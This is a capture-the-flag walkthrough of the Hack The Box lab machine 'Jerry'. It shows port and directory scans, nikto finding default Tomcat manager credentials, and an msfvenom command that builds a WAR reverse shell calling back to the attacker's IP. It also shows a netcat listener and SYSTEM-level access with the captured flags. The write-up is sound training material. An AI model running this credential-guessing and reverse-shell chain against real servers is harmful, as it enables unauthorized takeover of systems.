Jerry

Reconnaissance:

┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -O 10.10.10.95

8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-title: Apache Tomcat/7.0.88
|_http-server-header: Apache-Coyote/1.1
|_http-open-proxy: Proxy might be redirecting requests
|_http-favicon: Apache Tomcat
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port

┌──(kali💀kali)-[~]
└─$ sudo nmap -sU -O 10.10.10.95 

Not shown: 1000 open|filtered udp ports (no-response)

┌──(kali💀kali)-[~]
└─$ gobuster dir -w /usr/share/wordlists/dirb/common.txt -t 30 -e -k -x .html,.php -u http://10.10.10.95:8080 

http://10.10.10.95:8080/aux                  (Status: 200) [Size: 0]
http://10.10.10.95:8080/com1                 (Status: 200) [Size: 0]
http://10.10.10.95:8080/com2                 (Status: 200) [Size: 0]
http://10.10.10.95:8080/com3                 (Status: 200) [Size: 0]
http://10.10.10.95:8080/con                  (Status: 200) [Size: 0]
http://10.10.10.95:8080/docs                 (Status: 302) [Size: 0] [--> /docs/]
http://10.10.10.95:8080/examples             (Status: 302) [Size: 0] [--> /examples/]
http://10.10.10.95:8080/favicon.ico          (Status: 200) [Size: 21630]
http://10.10.10.95:8080/host-manager         (Status: 302) [Size: 0] [--> /host-manager/]
http://10.10.10.95:8080/lpt1                 (Status: 200) [Size: 0]
http://10.10.10.95:8080/lpt2                 (Status: 200) [Size: 0]
http://10.10.10.95:8080/manager              (Status: 302) [Size: 0] [--> /manager/]
http://10.10.10.95:8080/nul                  (Status: 200) [Size: 0]

┌──(kali💀kali)-[~]
└─$ nikto -host 10.10.10.95:8080

+ Server: Apache-Coyote/1.1
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /favicon.ico: identifies this app/server as: Apache Tomcat (possibly 5.5.26 through 8.0.15), Alfresco Community. See: https://en.wikipedia.org/wiki/Favicon
+ OPTIONS: Allowed HTTP Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS .
+ HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /examples/servlets/index.html: Apache Tomcat default JSP pages present.
+ /examples/jsp/snp/snoop.jsp: Displays information about page retrievals, including other users. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2104
+ /manager/html: Default account found for 'Tomcat Manager Application' at (ID 'tomcat', PW 's3cret'). Apache Tomcat. See: CWE-16
+ /host-manager/html: Default Tomcat Manager / Host Manager interface found.
+ /manager/html: Tomcat Manager / Host Manager interface found (pass protected).

We have one port open.

• Port 8080: running Apache Tomcat/Coyote JSP engine 1.1

Before we move on to enumeration, let’s make some mental notes about the scan results.

• Port 8080 is running Apache Tomcat and the nmap scan found the /manager/html page, which is the login page to the Manager interface. The nikto scan identified that this page is using the default credentials tomcat/s3cret. Apache Tomcat by design allows you to run code, so we can simply deploy a war file that sends a reverse shell back to our attack machine.

Exploitation:

Visit the /manager/html page and log in with the credentials tomcat/s3cret.

http://10.10.10.95:8080/manager/html

Generate a war file that contains a reverse shell using msfvenom.

┌──(kali💀kali)-[~/Desktop]
└─$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.3 LPORT=1234 -f war > shell.war

Upload the file on the Tomcat Application Manager and deploy it. Set up a listener on the target machine.

┌──(kali💀kali)-[~]
└─$ nc -nlvp 1234

Click on the war file in the Tomcat Application Manager to execute our shell.

C:\apache-tomcat-7.0.88>whoami
whoami
nt authority\system

We get a shell with SYSTEM privileges! That was easy! We don’t even have to escalate our privileges for this box.

C:\Users\Administrator\Desktop\flags>type "2 for the price of 1.txt"
type "2 for the price of 1.txt
user.txt
7004-----------------------------

root.txt
04a8b3-----------------------------